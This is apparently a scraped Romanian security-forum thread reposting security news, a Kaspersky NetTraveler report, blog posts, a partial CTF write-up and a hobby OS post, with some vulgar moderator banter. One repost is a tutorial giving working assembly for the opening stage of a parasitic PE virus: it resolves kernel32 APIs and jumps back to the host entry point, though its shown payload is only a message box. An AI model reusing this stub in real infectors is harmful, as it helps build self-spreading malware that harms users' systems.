Nytro

[h=2]Facebook Reveals Details of US Data Requests[/h]By AFP on June 15, 2013 WASHINGTON - Facebook revealed Friday it received between 9,000 and 10,000 requests for user data from US authorities in the second half of last year, as it seeks to shield itself from a growing scandal. The requests covered issues from child disappearances to petty crimes and terror threats and targeted between 18,000 and 19,000 accounts, the social networking site said, without revealing how often it complied with the requests. Facebook "aggressively" protects its users' data, the company's general counsel Ted Ullyot said in a statement. "We frequently reject such requests outright, or require the government to substantially scale down its requests, or simply give the government much less data than it has requested. And we respond only as required by law," he added. Facebook is fighting an expanding public backlash after a government contractor revealed it was among nine Internet giants that turned over user data to the secret National Security Agency surveillance program PRISM. The companies, which also include Apple, Google, Microsoft and Yahoo, have denied claims the NSA could directly access their servers. US authorities have said the program helped prevent terror attacks. Facebook said it was able to report all US national security-related requests, which no company had previously been allowed to do, after pressing the government to release more details about the program. But, for now, it said the government would only allow Facebook to provide the numbers in aggregate form and as a range. "This is progress, but we're continuing to push for even more transparency, so that our users around the world can understand how infrequently we are asked to provide user data on national security grounds," Ullyot said. Google asked the FBI and US Justice Department this week for permission to release numbers related to its handing over of data for the leaked surveillance programs, saying it has "nothing to hide." The company's "transparency report" on government requests does not include national security requests under the Foreign Intelligence Surveillance Act (FISA) that authorized PRISM. In a statement Friday, a Google spokesperson said the company has "always believed it's important to differentiate between different types of government requests," adding that it wants to "publish aggregate numbers of national security requests, including FISA disclosures, separately." Leaker Edward Snowden, who worked as a subcontractor handling computer networks for the NSA, is in Hong Kong, a semi-autonomous Chinese territory, where he has vowed to contest any possible extradition in court. He also revealed the NSA's gathering of a huge trove of telephone metadata. US authorities said they could not mine the logs to target a specific user without authorization from a secret court. Sursa: Facebook Reveals Details of US Data Requests | SecurityWeek.Com

[h=1]Kaspersky Lab a descoperit „Opera?iunea NetTraveler”, o campanie de spionaj cibernetic la nivel global care a avut ca ?inte organiza?ii guvernamentale ?i institute de cercetare[/h] Toolkit-ul malware NetTraveler a infectat 350 de victime importante, având ca scop supravegherea ?i furtul de date. Bucure?ti, 5 iunie 2013 - Echipa de exper?i a Kaspersky Lab a publicat un nou raport de cercetare cu privire la NetTraveler, o familie de programe malware utilizate in opera?iuni de tip Advanced Persistent Threat (APT) pentru a compromite cu succes peste 350 de victime foarte importante din 40 de ??ri diferite. Gruparea NetTraveler a infectat victime din numeroase organiza?ii, atât din sectorul public, cât ?i din cel privat, inclusiv institu?ii guvernamentale, ambasade, organiza?ii din industria de petrol ?i gaze, centre de cercetare, centre militare ?i organiza?ii de activi?ti. Potrivit raportului Kaspersky Lab, aceast? amenin?are este activ? înc? din 2004, îns? cel mai mare volum de activitate s-a înregistrat în perioada 2010 - 2013. Cele mai importante domenii de interes pentru gruparea de spionaj cibernetic NetTraveler au inclus recent explorarea spa?ial?, nanotehnologia, produc?ia de energie, energia nuclear?, tehnologia laser, medicina ?i comunica?iile. Metode de infectare: Atacatorii infectau sistemele victimelor trimi?ând e-mailuri de tip spear-phishing, care con?ineau ata?amente Microsoft Office echipate cu dou? vulnerabilit??i intens exploatate (CVE-2012-0158 ?i CVE-2010-3333). Chiar dac? Microsoft a lansat deja patch-uri pentru aceste vulnerabilit??i, ele sunt în continuare exploatate pe scar? larg? în atacuri targetate, dovedindu-se a fi eficiente. Titlurile ata?amentelor mali?ioase din e-mailurile de tip spear-phishing relev? eforturile grup?rii NetTraveler de a-?i adapta atacurile pentru a putea infecta ?intele foarte importante. Printre titlurile documentelor mali?ioase se num?r?: Army Cyber Security Policy 2013.doc Report - Asia Defense Spending Boom.doc Activity Details.doc His Holiness the Dalai Lama’s visit to Switzerland day 4 Freedom of Speech.doc Furtul ?i extragerea de informa?ii: În cadrul analizei Kaspersky Lab, echipa de exper?i a ob?inut jurnalele de infectare de pe diferite servere de comand? ?i de control (C&C) ale grup?rii NetTraveler. Serverele C&C erau utilizate pentru a instala un malware adi?ional pe dispozitivele infectate ?i pentru a extrage informa?iile furate. Exper?ii Kaspersky Lab au estimat cantitatea de informa?ii furate stocate pe serverele de comand? ?i de control ale NetTraveler ca fiind de peste 22 gigabytes. Datele sustrase de pe sistemele infectate au inclus list?ri ale fi?ierelor, loguri de taste ap?sate, dar ?i alte tipuri de fi?iere, cum ar fi PDF-uri, tabele Excel sau documente Word. În plus, toolkit-ul NetTraveler putea s? instaleze un malware suplimentar de tip backdoor creat pentru sustragerea datelor, care putea fi personalizat pentru a fura alte tipuri de informa?ii delicate, cum ar fi detalii de configurare pentru aplica?ii sau fi?iere de proiectare asistat? de calculator (CAD). Statistici ale infect?rii globale: Potrivit analizei Kaspersky Lab asupra serverelor de comand? ?i control ale grup?rii NetTraveler, au existat, în total, 350 de victime în 40 de ??ri diferite, inclusiv Statele Unite, Canada, Marea Britanie, Rusia, Chile, Maroc, Grecia, Belgia, Austria, Ucraina, Lituania, Belarus, Australia, Hong Kong, Japonia, China, Mongolia, Iran, Turcia, India, Pakistan, Coreea de Sud, Thailanda, Qatar, Kazakhstan ?i Iordania. Pe lâng? analiza datelor cu privire la centrele ce control ?i comand?, exper?ii Kaspersky Lab au folosit Kaspersky Security Network (KSN) pentru a identifica statistici suplimentare cu privire la infec?ie. Primele 10 ??ri dup? num?rul de victime detectate de KSN au fost Mongolia, urmat? de Rusia, India, Kazakhstan, Kyrgyzstan, China, Tajikistan, Coreea de Sud, Spania ?i Germania. Descoperiri suplimentare În timpul analizei Kaspersky Lab asupra NetTraveler, exper?ii companiei au identificat ?ase victime care au fost infectate atât de NetTraveler, cât ?i de Red October, o alt? opera?iune de spionaj cibernetic analizat? de Kaspersky Lab în luna ianuarie 2013. De?i nu a fost identificat? nicio leg?tur? direct? între atacatorii NetTraveler ?i actorii implica?i în opera?iunea Red October, faptul c? anumite victime au fost afectate de ambele campanii de spionaj cibernetic demonstreaz? c? aceste victime foarte importante sunt ?inta mai multor atacatori din cauz? c? informa?iile pe care le de?in sunt foarte valoroase. Raportul complet al analizei Kaspersky Lab, inclusiv indicatorii compromiterii, tehnicile de remediere ?i detaliile cu privire la opera?iunea NetTraveler cu toate componentele sale mali?ioase, este disponibil pe Securelist. Produsele Kaspersky Lab detecteaz? ?i neutralizeaz? programele mali?ioase ?i toate versiunile folosite de Toolkit–ul NetTraveler, inclusiv Trojan-Spy.Win32.TravNet ?i Downloader.Win32.NetTraveler. Produsele Kaspersky Lab detecteaz? exploit-urile Microsoft Office folosite în atacurile de tip spear-phishing, inclusiv Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158. # # # Despre Kaspersky Lab Kaspersky Lab este cel mai mare produc?tor privat de solu?ii de securitate endpoint din lume, fiind inclus în topul primilor patru produc?tori de solu?ii pentru protec?ie endpoint la nivel mondial*. Pe parcursul celor 15 ani de existen??, Kaspersky Lab a r?mas o companie inovatoare în domeniul securit??ii informatice ?i ofer? suite de protec?ie IT pentru utilizatori individuali, SMB ?i companii mari. Compania este prezent? în aproximativ 200 de ??ri ?i protejeaz? peste 300 de milioane de utilizatori din întreaga lume. Pentru mai multe informa?ii, vizita?i www.kaspersky.ro. Sursa: Kaspersky Lab a descoperit „Opera?iunea NetTraveler”, o campanie de spionaj cibernetic la nivel global care a avut ca ?inte organiza?ii guvernamentale ?i institute de cercetare | kaspersky.ro

"Cosul de gunoi" si "Cele mai penale posturi" nu sunt de ajuns, ne mai trebuie o categorie: "Cele mai de cacat posturi".

[h=1]8 months in Microsoft, I learned these [/h]07. June 2013 by Ahmet Alp Balkan Two years ago today, I started Microsoft Windows Azure as an intern, in the very same team I joined right after college and I am working for last 8 months. I decided to summarize a few points I learned so far in this job during last 8 months. This may sound like the way things work are crappy, it is not. I learned that one will see this sort of problems in all large scale companies. Most of them are not specific to Microsoft at all. Every company has its own problems. I am not saying that I am unhappy and not complaining. These are purely a few lessons I was not aware of in the college (expectations vs reality sort of article). Read on: Expect no documentation in corporations. I have seen the knowledge inside the company is mostly transferred by talking and hands-on sessions. Some parts of knowledge base generated are only emailed and not saved anywhere permanent. This is not how the information flows in the digital world. There are certain people, if they got hit by a bus, nobody can pick up their work or code. And it is okay. If this would have been my own company there would be tons of wiki pages. It is not what you do, it is what you sell. You can spend days making your codebase a better place, writing more robust code and fix others’ mistakes. As long as it does not have a big business impact and you can’t ship it, it means practically nothing. Nobody will appreciate you for fixing styling or architectural issues in their core, in fact they may get offended. That’s not something I realized when I was a student. Not everybody is passionate for engineering. You don’t always work with people passionate for creating wonderful software. Mostly, people have other things to do (e.g. family and kids) and writing better code is not a priority for the most. And it is okay. I learned not to expect enthusiasm from everybody. 2-3 hours of coding a day is great. Before taking the job, I was able to code 8-10 hours a day on my personal projects. Somehow in this environment it is almost impossible to get 2 hours straight of coding for me. I spend most of my time trying to figure out how others’ uncommented/undocumented code work, debugging strange things and attending daily meetings. Apparently it’s not just me and there can be days no single commits are pushed to the source control in a team. And it is okay. Not giving back to the public domain is a norm. I haven’t met almost any bloggers or open source developers in my organization dedicating some of their time to give back to the community. Everybody loves finding Stack Overflow answers on search results, but nobody contributes those answers. I can understand that. The world outside is not known here a lot. I bet you’re reading what sort of latest technologies and tools are out on blogs, Reddit or Hacker News every day. It’s not common here. I am surprised that no one I met in Windows Azure team heard about Heroku or Rackspace, which are direct competitors. That’s acceptable, not everybody has to know these. It is all about getting shit done in corporations. If your manager asks a button there doing that, nobody cares what sort of mess you created. As long as that functionality is ready, it is okay and can always be fixed later. (I haven’t seen that ever happened, yet.) In college, I learned code quality is as important as the result, turned out wrong. Copy-pasting code can be okay. If somebody sees you doing this outside the corporations, you’ll probably get punched in the face. I’ve seen source files copy pasted across projects. As long as it gets shit done (described above) no one cares if you produced unmaintainable code. Code reviews can be skipped, for the sake of agility. It’s part of the culture in my team, if you are messing with somebody else’s code, you’ll send code reviews. Otherwise it is usually not done and you may wait a lot of time and after a lot of pings to draw some attention, maybe somebody will respond. Latest software, meh. Not everybody is fond of latest versions here. Almost 90% of my colleagues use older versions of Office, Windows, Visual Studio and .NET Framework. There is a common belief that newer versions will break existing workflows. This might be the same reason why some enterprises still run all their software on Java 1.3-1.5. So, I learned not to expect latest software on environments. Your specialties usually do not matter. Thousands get hired every year out of college and usually randomly assigned to a team (which you can’t change for 1.5 years). It does not matter whether you have mastered MongoDB, created iOS apps, been an Apache committer, created your own networking library, designed user interfaces or bootstrapped your own startup. You are hired to do get something needed done. I was not expecting that. It’s hard to find a position in corporations matches what you love to do. At the end, you are working for your manager’s and their managers’ paychecks. I was not aware of this fact in college. (This post made it to the top of Hacker News and /r/programming. Thanks everyone for comments and support. There are over 1,000 comments on HN, Reddit and below, I did not have a chance to read them all, sorry if I missed yours.) Sursa: 8 months in Microsoft, I learned these | /home/alp

Nu se poate, orice am incerca, baietii sunt foarte inventivi si ar gasi rapid "bypass"-uri. In plus, nu prea se injura, ca se folosesc cuvinte "vulgare", pula mea, e ok, dar nu permitem atacurile la persoana.

@semaca16: Care esti ma? Ce grupa? Vezi ca restantele s-au scumpit la 50 RON.

Incursiune printre serverele Facebook care vor stoca pozele, comentariile ?i like-urile europenilor Facebook a dat drumul celui mai nou centru de date pe care-l de?ine, locul prin care vor trece Like-urile, Share-urile ?i informa?iile noastre private. Centrul din Suedia este unul dintre cele mai impresionante din lume. Centrul de date din Lulea, Suedia a fost pornit ast?zi, iar reprezentan?ii Facebook au spus c? are posibilitatea de a fi unul dintre cele mai eficiente ?i mai sustenabile centre de date din lume. Compania a men?ionat c? toate echipamentele sunt alimentate de energie hidroelectric?, iar generatoarele de rezerv? sunt mult mai pu?ine, datorit? capacit??ilor de refolosire a energiei. Facebook a ales nordul Suediei pentru acest centru de date ca s? r?ceasc? serverele unde stocheaz? pozele, video-urile, comentariile ?i like-urile noastre. C?ldura suplimentar? generat? de centrul de date este folosit? pentru a înc?lzi birourile angaja?ilor. Pozi?ionarea serverelor în Suedia ar putea aduce utilizatorilor din Europa performan?e mai bune ?i mai rapide. Centrul a fost anun?at în octombrie 2011 de c?tre vicepre?edintele de opera?iuni Facebook, Tom Furlong. Centrul de date din Lulea este primul din afara Statelor Unite ale Americii. Pân? s? aleag? Suedia, Facebook a avut de ales între diferite zone reci ale Europei. Astfel, Lulea este la 100 de kilometri de Cercul polar Arctic ?i este în apropierea unui râu. Fiecare cl?dire are 14 generatoare de rezerv?, care func?ioneaz? pe motorin?. Poze si video: GALERIE FOTO Incursiune printre serverele Facebook care vor stoca pozele, comentariile ?i like-urile europenilor | adevarul.ro

[h=3]Vanilla1 : write-what-where exploitation (ASLR, Full RELRO, Stack cookie)[/h]Hello, For today article, we're going to analyze and exploit a write-what-where with ASLR, no PIE, full RELRO and stack cookie. This is part of a set of challenges made by sm0k: Vanilla Dome Wargame . Let's begin. [h=2]The challenge[/h] Before any reversing attempt, we need to launch the program to see what it does. vanilla1@VanillaDome ~ $ ls -lash total 76K 4.0K drwxr-xr-x 2 root root 4.0K Apr 29 14:15 . 4.0K drwxr-x--x 10 root root 4.0K May 15 20:52 .. 4.0K -rw-r--r-- 1 root root 127 Mar 23 05:56 .bash_logout 4.0K -rw-r--r-- 1 root root 193 Mar 23 05:56 .bash_profile 4.0K -rw-r--r-- 1 root root 3.9K Apr 29 15:47 .bashrc 44K -rw-r--r-- 1 root root 44K Apr 29 14:15 .gdbinit 8.0K -r-sr-sr-x 1 vanilla1crack vanilla1crack 6.7K Apr 29 12:28 Vanilla1 4.0K -r-------- 1 vanilla1crack vanilla1crack 19 Apr 29 12:28 key vanilla1@VanillaDome ~ $ ./Vanilla1 Usage:./Vanilla1 <file> vanilla1@VanillaDome ~ $ ./Vanilla1 key vanilla1@VanillaDome ~ $ python -c 'print "a" * 1024' > /tmp/file.txt vanilla1@VanillaDome ~ $ ./Vanilla1 /tmp/file.txt Ok, it basically read some file and do stuffs with it ... [h=2]Let's reverse it[/h] Opening GDB and disassembling main we get the following: Dump of assembler code for function main: 0x08048578 <+0>: push ebp 0x08048579 <+1>: mov ebp,esp 0x0804857b <+3>: and esp,0xfffffff0 ; alignment 0x0804857e <+6>: sub esp,0x1050 ; there is a HUGE buffer and we have ebp = esp + 0x1050 0x08048584 <+12>: mov eax,DWORD PTR [ebp+0x8] ; argc 0x08048587 <+15>: mov DWORD PTR [esp+0x1c],eax ; n_arg = argc 0x0804858b <+19>: mov eax,DWORD PTR [ebp+0xc] ; argv 0x0804858e <+22>: mov DWORD PTR [esp+0x18],eax ; args = argv 0x08048592 <+26>: mov eax,gs:0x14 ; eax = stack cookie 0x08048598 <+32>: mov DWORD PTR [esp+0x104c],eax ; stack cookie (stored in gs:0x14) 0x0804859f <+39>: xor eax,eax 0x080485a1 <+41>: cmp DWORD PTR [esp+0x1c],0x1 ; if (n_arg <= 1) then error 0x080485a6 <+46>: jg 0x80485c4 <main+76> ; else continue 0x080485a8 <+48>: mov eax,DWORD PTR [esp+0x18] ; args ptr 0x080485ac <+52>: mov edx,DWORD PTR [eax] ; program name 0x080485ae <+54>: mov eax,0x8048790 ; format = "\t Usage:%s <file>\n" ; printf ("\t Usage:%s <file>\n", argv[0]); 0x080485b3 <+59>: mov DWORD PTR [esp+0x4],edx 0x080485b7 <+63>: mov DWORD PTR [esp],eax 0x080485ba <+66>: call 0x8048434 <printf@plt> 0x080485bf <+71>: jmp 0x80486a9 <main+305> ; bye ; memset (esp+0x38, 0x0, 0x1000); 0x080485c4 <+76>: mov DWORD PTR [esp+0x34],0x0 ; fp = NULL; 0x080485cc <+84>: mov DWORD PTR [esp+0x8],0x1000 0x080485d4 <+92>: mov DWORD PTR [esp+0x4],0x0 0x080485dc <+100>: lea eax,[esp+0x38] 0x080485e0 <+104>: mov DWORD PTR [esp],eax 0x080485e3 <+107>: call 0x80483f4 <memset@plt> ; fp = fopen (argv[1], "r"); 0x080485e8 <+112>: mov edx,0x80487a3 ; "r" 0x080485ed <+117>: mov eax,DWORD PTR [esp+0x18] ; args 0x080485f1 <+121>: add eax,0x4 0x080485f4 <+124>: mov eax,DWORD PTR [eax] ; eax = args[1]; 0x080485f6 <+126>: mov DWORD PTR [esp+0x4],edx 0x080485fa <+130>: mov DWORD PTR [esp],eax 0x080485fd <+133>: call 0x8048424 <fopen@plt> 0x08048602 <+138>: mov DWORD PTR [esp+0x34],eax 0x08048606 <+142>: cmp DWORD PTR [esp+0x34],0x0 ; if (fp == NULL) then error 0x0804860b <+147>: je 0x80486a9 <main+305> 0x08048611 <+153>: jmp 0x8048682 <main+266> ; else fgets ; value1 = atoll (buffer); 0x08048613 <+155>: lea eax,[esp+0x1038] ; this is a small buffer (ebp-0x1050+0x1038 = ebp-0x18) 0x0804861a <+162>: mov DWORD PTR [esp],eax 0x0804861d <+165>: call 0x8048414 <atoll@plt> 0x08048622 <+170>: mov DWORD PTR [esp+0x30],eax ; fgets (sbuffer, 0x14, fp); 0x08048626 <+174>: mov eax,DWORD PTR [esp+0x34] ; eax = fp 0x0804862a <+178>: mov DWORD PTR [esp+0x8],eax 0x0804862e <+182>: mov DWORD PTR [esp+0x4],0x14 0x08048636 <+190>: lea eax,[esp+0x1038] ; sbuffer 0x0804863d <+197>: mov DWORD PTR [esp],eax 0x08048640 <+200>: call 0x80483e4 <fgets@plt> ; value2 = atoll(sbuffer); 0x08048645 <+205>: lea eax,[esp+0x1038] 0x0804864c <+212>: mov DWORD PTR [esp],eax 0x0804864f <+215>: call 0x8048414 <atoll@plt> 0x08048654 <+220>: mov DWORD PTR [esp+0x2c],eax 0x08048658 <+224>: cmp DWORD PTR [esp+0x30],0x0 ; if (value1 == 0) then fgets 0x0804865d <+229>: je 0x8048682 <main+266> 0x0804865f <+231>: cmp DWORD PTR [esp+0x2c],0x0 ; if (value2 == 0) then fgets 0x08048664 <+236>: je 0x8048682 <main+266> ; insert (value2, value1, esp+0x38); 0x08048666 <+238>: lea eax,[esp+0x38] 0x0804866a <+242>: mov DWORD PTR [esp+0x8],eax 0x0804866e <+246>: mov eax,DWORD PTR [esp+0x30] ; eax = value1 0x08048672 <+250>: mov DWORD PTR [esp+0x4],eax 0x08048676 <+254>: mov eax,DWORD PTR [esp+0x2c] ; eax = value2 0x0804867a <+258>: mov DWORD PTR [esp],eax 0x0804867d <+261>: call 0x8048534 <insert> ; fgets (buffer, 0x14, fp); 0x08048682 <+266>: mov eax,DWORD PTR [esp+0x34] ; eax = fp 0x08048686 <+270>: mov DWORD PTR [esp+0x8],eax 0x0804868a <+274>: mov DWORD PTR [esp+0x4],0x14 0x08048692 <+282>: lea eax,[esp+0x1038] ; buffer 0x08048699 <+289>: mov DWORD PTR [esp],eax 0x0804869c <+292>: call 0x80483e4 <fgets@plt> 0x080486a1 <+297>: test eax,eax ; if (still data) then loop 0x080486a3 <+299>: jne 0x8048613 <main+155> ; check cookie 0x080486a9 <+305>: mov eax,0x0 0x080486ae <+310>: mov edx,DWORD PTR [esp+0x104c] ; stack cookie 0x080486b5 <+317>: xor edx,DWORD PTR gs:0x14 0x080486bc <+324>: je 0x80486c3 <main+331> 0x080486be <+326>: call 0x8048444 <__stack_chk_fail@plt> 0x080486c3 <+331>: leave 0x080486c4 <+332>: ret End of assembler dump. Articol complet: http://binholic.blogspot.ro/2013/06/vanilla1-write-what-where-exploitation.html

[h=1]Six months with Windows 8 (white paper)[/h]By Aryeh Goretsky posted 6 Jun 2013 at 09:00AM When Windows 8 first came out, ESET was the first to publish a white paper looking at its security features. In the intervening half-year, we have continued our research, observing how well Windows 8 is doing from a security perspective, as well how it is being adopted by our customers. As a result of continuing research, we have released a new paper, detailing our observations in the first six months. Here are some of the key findings from the first six months with Windows 8: About 3.3% of ESET’s 100M+ customers have adopted Windows 8 (which is a slightly higher adoption rate than most organizations tracking Windows 8 – such as NetApps – have reported, but lower than that of at least one reporter, Valve, which collects data from gamers’ PCs) The replacement of the Start Menu with the Start Screen has generated a whole new ecosystem of Start Menu substitutes. ESET does not treat these programs as malware or PUAs simply because of this functionality, which offer a more traditional interface that many people seem to appreciate. It is important to keep in mind such programs could contain malware, be bundled with potentially unwanted software, or engage in other behavior that causes them to be classified as a threat, unsafe, unwanted or even a suspicious application. No malware was identified in the Windows Store, which now has about 60,000 apps. There have been problems with fake apps in the Windows Store, though, as well as ebook piracy. The current nature of the Windows Store may be hampering Windows 8?s acceptance in BYOD scenarios because of manageability or legal concerns by corporate customers. Windows 8?s Secure UEFI Boot process appears to be intact, with no signs that malware has bypassed it so far. Windows RT comes with a somewhat-hidden copy of Windows Defender app bundled in it. Like its counterpart in Windows 8, Windows Defender provides a base level of security for the operating system. Unlike its counterpart in Windows 8, the Windows RT version it cannot be replaced by another solution. For more information, you can download the white paper directly at Six Months with Windows 8 [PDF, 787KB] or to see all of ESET’s white papers, click on the Papers tab, above. Aryeh Goretsky, MVP, ZCSE Distinguished Researcher Sursa: Six months with Windows 8 (white paper) - We Live Security

[h=2]CONFidence 2013 and the x86 quirks[/h]Another week, another conference. Just a few days ago, Gynvael and I had the pleasure to attend and present at the CONFidence 2013 infosec conference traditionally held in Cracow, Poland. The event requires no further introduction – it has been simply the best Polish conference in the security area since it first started, and this year’s edition was up to the usual high standard – we had some great time, meeting old and making new friends as well as enjoying some of the better talks. With regards to our presentation, we originally intended it to be a gathering of references concerning all of the interesting quirks, undocumented behavior and other amusing facts (directly or indirectly related to the CPU architecture) that we heard or learnt about in both 32 and 64-bit x86 processors during the recent years. If you are closely following the CPU hacking and operating system security scene, you are probably aware of most of the material we presented – still, we hope it proves useful as a thorough reference and possibly motivates you to take a deeper look at some of the areas we discussed during the talk. In addition to what was covered on stage, you can also find several extra “further reading” slides containing references to information which did not fit into the elementary slide deck. Download: Beyond MOV ADD XOR – the unusual and unexpected in x86 (PDF, 5.6MB) Sursa: CONFidence 2013 and the x86 quirks | j00ru//vx tech blog

[h=1]BIND 9 patched against remote crash vuln[/h][h=2]Protection against DoS[/h] By Richard Chirgwin, 11th June 2013 Time to get patching, sys admins: ISC (the Internet Systems Consortium) has issued a fix for a BIND 9 denial of service vulnerability. The defect and patch, published last week, “allows an attacker to crash a BIND 9 recursive resolver with a RUNTIME_CHECK error in resolver.c”, the ISC says in its announcement. CVE-2013-3919 says BIND 9.6-ESV-R9, 9.8.5 and 9.9.3 are affected by the bug. While older versions aren't affected, ISC notes that they're also unsupported and could be carrying other unpatched vulnerabilities. “At the time of this advisory no intentional exploitation of this bug has been observed in the wild. However, the existence of the issue has been disclosed on an open mailing list with enough accompanying detail to reverse engineer an attack and ISC is therefore treating this as a Type II (publicly disclosed) vulnerability, in accordance with our Phased Disclosure Process”, the ISC announcement says. Upgraded versions can be downloaded here. ® Sursa: BIND 9 patched against remote crash vuln • The Register

[h=1][Quick tutorial] Finding Kernel32 Base and walking its export table[/h]by SIGSEGV Hey all , I'll just begin as the title says it all. Only Basic PE-format and assembly knowledge are required. The baby steps of any parasitic PE virus should be Finding the Kernel32 Base in the current process address space , then walking its export table to extract the addresses of all the functions it needs. To find the Kernel base , We'll exploit the fact that the Process Environment Block structure of the current process holds a list of the modules , loaded in the process's address space , in their memory loading order , InMemoryOrderModuleList. In Windows NT , The value at offset 0x30 of the FS segment points to the PEB structure : typedef struct _PEB { BOOLEAN InheritedAddressSpace; BOOLEAN ReadImageFileExecOptions; BOOLEAN BeingDebugged; BOOLEAN Spare; HANDLE Mutant; PVOID ImageBaseAddress; PPEB_LDR_DATA LoaderData; // The rest of the structure is irrelevant to us } PEB, *PPEB; So , we follow the LoaderData pointer , which takes us to another structure , PEB_LDR_DATA : typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA; InMemoryOrderModule is a double linked list and it's what we are interested in , each entry in the list points to an LDR_MODULE structure : typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; //..... } LDR_MODULE, *PLDR_MODULE; This structure holds the base address of it's module ,, Now , from Windows 2000 and up to windows 7 , The third module loaded in memory will always be that kernel32.dll. Putting all into code : mov ebx, [FS : 0x30] ; PEB mov ebx, [ebx + 0x0C] ; PEB->Ldr mov ebx, [ebx + 0x14] ; PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Third entry's base address (Kernel32.dll) mov [ebp+dwKernelBase] , ebx The following example does the following : Find Kernel32.dll base address Parse it's export tables to locate GetProcAddress Use it to locate LoadLibraryA Use it to Load User32.dll into the current address space Use GetProcAddress to locate MessageBoxA in User32.dll Display a Message box Return to Host. I'm in the middle of my final exams , so I'm afraid I can't explain the example thoroughly , but anyone with basic PE and assembly knowledge should easily grasp it. ; By SIGSEGV [BITS 32] pushad call CodeStart CodeStart: pop ebp sub ebp,CodeStart ; delta offset shit mov ebx, [FS : 0x30] ; get a pointer to the PEB mov ebx, [ebx + 0x0C] ; get PEB->Ldr mov ebx, [ebx + 0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Get Kernel32 Base mov [ebp+dwKernelBase] , ebx add ebx, [ebx+0x3C] ; Start of PE header mov ebx, [ebx+0x78] ; RVA of export dir add ebx, [ebp+dwKernelBase] ; VA of export dir mov [ebp+dwExportDirectory] , ebx lea edx,[ebp+api_GetProcAddress] mov ecx,[ebp+len_GetProcAddress] call GetFunctionAddress mov [ebp+AGetProcAddressA] , eax lea edx,[ebp+api_LoadLibrary] push edx push dword [ebp+dwKernelBase] call eax mov [ebp+ALoadLibraryA] , eax lea edx , [ebp+szUser32] push edx call eax lea edx , [ebp+api_MessageBoxA] push edx push eax mov ebx,[ebp+AGetProcAddressA] call ebx mov [ebp+AMessageBoxAA] , eax push 0 lea edx,[ebp+szTitle] push edx lea edx,[ebp+szMsg] push edx push 0 call eax popad push 0xBBBBBBBB ;OEP retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; <<<<< GetFunctionAddress >>>>>> ; ; Extracts Function Address From Export Directory and returns it in eax ; ; Parameters : Function name in edx , Length in ecx ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetFunctionAddress: push ebx push esi push edi mov esi, [ebp+dwExportDirectory] mov esi, [esi+0x20] ;RVA of ENT add esi, [ebp+dwKernelBase] ;VA of ENT xor ebx,ebx cld looper: inc ebx lodsd add eax , [ebp+dwKernelBase] ;eax now points to the string of a function push esi ;preserve it for the outer loop mov esi,eax mov edi,edx cld push ecx repe cmpsb pop ecx pop esi jne looper dec ebx mov eax,[ebp+dwExportDirectory] mov eax,[eax+0x24] ;RVA of EOT add eax,[ebp+dwKernelBase] ;VA of EOT movzx eax , word [ebx*2+eax] ;eax now holds the ordinal of our function mov ebx,[ebp+dwExportDirectory] mov ebx,[ebx+0x1C] ;RVA of EAT add ebx,[ebp+dwKernelBase] ;VA of EAT mov ebx,[eax*4+ebx] add ebx,[ebp+dwKernelBase] mov eax,ebx pop edi pop esi pop ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Data Shit ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; szTitle: db "Yo !",0 szMsg: db "GreeTz From SIGSEGV",0 szUser32 db "User32.dll",0 AGetProcAddressA: dd 0 api_GetProcAddress: db "GetProcAddress" len_GetProcAddress: dd $-api_GetProcAddress ALoadLibraryA: dd 0 api_LoadLibrary: db "LoadLibraryA",0 AMessageBoxAA: dd 0 api_MessageBoxA: db "MessageBoxA",0 dwKernelBase: dd 0 dwExportDirectory: dd 0 That's it , but I shall post the complete virus source when i get through my exams. Hope you enjoyed this quick tutorial , any feedback is appreciated. Greets , SIGSEGV. Sursa: [Quick tutorial] Finding Kernel32 Base and walking its export table. - rohitab.com - Forums

[h=1]SidonX86 - A simple hobby OS[/h][h=3]by captmicro[/h] I'm new the the forums (though I browse alot) so I figured I'd post some content! This is my hobby OS I've been working on for the past year or so on and off when I have free time, it's still nothing near complete. It doesn't have paging at the moment but I'm reading up about it and attempting to get it working on another OS before I implement it for this. It has memory allocation (blocks only), a text-mode screen library, a minimal c standard library (written by myself, and I have to say it's not the best), a serial port library, and a simple interrupt manager. So far the only applications are a simple terminal, a half-working subleq OISC, and a hex editor (the only really decent app so far) that was ported from my xbox1 hex editor. I'm in the process of writing a transistor design and simulation tool for it, which is something I've really wanted to do for a long time, so expect that soon. One thing that really needs to be done is a disk interface or some sort of in-memory file system so I can load applications without having to compile them into the OS. I've had a go at it once but never tested it (due to not having a file system to load a binary from), so it might just work (see kernel/binldr/elf.c for the code). I have implemented loading apps over a serial port in another OS, but it's probably the WORST idea I ever had. As for the startup screen, don't mind it. This OS was intended to be my entry into low-level TCP/IP stack programming but I haven't gotten that far yet. Once I get a file system working I will probably start on the ethernet card driver and TCP/IP stack. Feel free to do whatever you want with this OS, just please credit me (except the bootloader, I barely wrote any of it). NOTE: you need mingw or some form of gcc, ld, and objcopy to use the build_kernel.bat script. NASM is included in the download splash screen: and the only decent app, the hex editor (it actually has quite a lot of features for a terminal hex editor!): [h=4]Attached Files[/h] likedev.zip 291.33K Sursa: SidonX86 - A simple hobby OS - rohitab.com - Forums

